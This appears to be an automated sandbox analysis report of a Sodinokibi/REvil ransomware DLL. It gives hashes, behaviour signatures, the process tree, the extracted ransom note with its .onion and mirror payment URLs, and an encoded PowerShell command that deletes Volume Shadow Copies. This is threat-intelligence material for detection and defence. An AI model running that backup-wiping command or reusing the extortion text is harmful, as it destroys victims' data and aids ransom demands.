Overview

overview

10

Static

static

10

e80810241a...4e.dll

windows7-x64

10

e80810241a...4e.dll

windows10-2004-x64

10

e80810241a...00.dll

windows7-x64

3

e80810241a...00.dll

windows10-2004-x64

3

Analysis

  • max time kernel
    117s
  • max time network
    117s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    29-12-2024 04:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e80810241a2c6991cd3cfc807a62c1392eeed146fc60cb30326a8e3bc6bc284e.dll

  • Size

    166KB

  • MD5

    a2fe81e5b83c0d1ea321429446870e18

  • SHA1

    b1fc2a1e8e1739ecf9fe2e0b7b20618321eea765

  • SHA256

    e80810241a2c6991cd3cfc807a62c1392eeed146fc60cb30326a8e3bc6bc284e

  • SHA512

    b0a250932cebbcfed89564a67c6b5385b9a65e089810bd071b1be721af7fee55af8ec31fd7b415295b6bbd1b2f1ef564c4a8c3c7b40101d1e90e5fb0cd7905c9

  • SSDEEP

    3072:MJMawtnGqtWoKeZ9fh1CgnNto6jfxCy1Z4HYPzy:Ww9vteqJggn7oUf0yyHL

Score
10/10
sodinokibidiscoveryransomware

Malware Config

Extracted

Path

C:\Recovery\i3gdzlx0l7-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion i3gdzlx0l7. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B0D1B65332B7658C 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/B0D1B65332B7658C Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 99QSY3RYK73nd/0r4ka8Ne5AApPfAlJ/hxllFnWVWqubEXGEUEvEMC1bvf399Ntj y+Gem92ZcnHmqDtdx43i4DBWiIO2oSPgouLFQVmyZCYUBRsdegSfDXjByKwbYDFY EZfaPFfFhDhmVDvXENz8qG38Elb/E0DsSmlHaX/ZPOVp3HQ8zmZiAASh4/U3Uvso qVQP/qVYv1oK79Sx+D+FDVXbh52d4IJKrkeHyxZeSSvNWj6LkqyjzCVfaqBtotVg 6NplLafIKFS2WXxnigxtGLndGYrt2WNGQs5x1mLpJC4m8ZdpiDZHP2qUTDQZ2CeX lEpsHdqgpu5DwrHUKHH4O7AD5J+fIjppWdlG/FuRAvv5IcMc1oP8wdPMYgCgmr3C EWB36mow+FRoz/8zkpCIldyTrMOLgtwSqYRz2lO0j6VeMONn5+nrG1QbUd9zjbsm vyswZkpHvVTih0TsTYJJWxQAMYcqDwJcDsQeVupjgUHgnzyDp5fWwyJDtfG+uNqm JskbS9VrcV5k7Dsvv4O9za/6VMEE3Nezh1OV14IzPZgJ5EUzDpK1FBgkiY2uECmS 2A9isKdNmCp4sz4dvxeV/HCGsddjpz1jAHZrj9xYou5gQi+SMa01sEgYMa03Zoed 2CIKdn5dPum9qYmQsRFXndoY6UeuJXFfod/LsYdOqQGwFgyzmivHQEScYS5zfKrg FAmslsRBkV9Nz5R4JFljPhCTOISbpo3f5P2MeB9OK3oHGQ9vkYHuxzd9Lggfc1yu SnrJ2G23mbEqpN0YGIykpdI9+W68cnQWp1DIkARbm3ZL5dve/zdGAJIj6MzcJAxH wT4/ZgyhER8omqQtVNUj7XyLnQdahsz6ieezPrrXYRkA1rsRBVCeVM5dAtOPQ4Lt WKVylOqodBNGP7NdDbY504sOaowuya6WEZ0V5Pa1/lGX+3LRXQoupKEBtbMhkhoY IaTNS+bczh4dxeoHh0NoLWo4DSOi77X0d735fV2hnO+jZH8IelnJH3hk64SGrDrO bFh1/VYm8LWMaFvyjkaVhDLp+eScsvtqiOuoNGwTbRA3kNIi7pcxYZm+80NujZJt gpaCeMv/yMAd/zopzP7V408gshvOQSPLlDm/XrRmUZT48KHEVlNlY1Aa/iOO6v9j xb9pqv2a38SwJi2iynFTEMWL8MKtfEwphG4eVcDl4xUfgM57Iao2weCGj5Gx2QUk vRmuCA1Tg0OAJAtcCqMVPI+83oXz4MbcJ3tdhVL2DJ4IYnUQmW8JqPD1B7CSbpDK pebBKOdKb4EibDovVCLq6BL0r56EJkrrpqfXFFoB8/N+WoLoaQczqlDl4nws2je7 6D/7mzhwOkFOfd+N/rApm4uyVxJJzyyjoe3xw9xOaR8xgvCtFQ6+sA== Extension name: i3gdzlx0l7 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B0D1B65332B7658C

http://decryptor.cc/B0D1B65332B7658C

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Sodinokibi family
    sodinokibi
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 32 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\e80810241a2c6991cd3cfc807a62c1392eeed146fc60cb30326a8e3bc6bc284e.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2232
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\e80810241a2c6991cd3cfc807a62c1392eeed146fc60cb30326a8e3bc6bc284e.dll,#1
      2⤵
      • Enumerates connected drives
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2176
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2784
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2840
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2652

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Recovery\i3gdzlx0l7-readme.txt
      Filesize

      7KB

      MD5

      a611f0053394dc67c6a8009b352af1b8

      SHA1

      8dcb379cfeb145fed02ef925bd9d5fa67bae3c07

      SHA256

      02088c121d5ccc7d454cc95869c79be808aa327f9fc9a12f7fef5027fd30746e

      SHA512

      f4ea3420d6e92b3f4851b9a29865ad80229830407e53e121907de5519f5b27bab110924b67afc5c9d1b7991088a45749c68180e9d1d5125f3b626e1c55b62701

      Download Submit

    • memory/2784-4-0x000007FEF612E000-0x000007FEF612F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2784-5-0x000000001B750000-0x000000001BA32000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2784-6-0x0000000001E80000-0x0000000001E88000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2784-7-0x000007FEF5E70000-0x000007FEF680D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2784-8-0x000007FEF5E70000-0x000007FEF680D000-memory.dmp

      Filesize

      9.6MB

      Download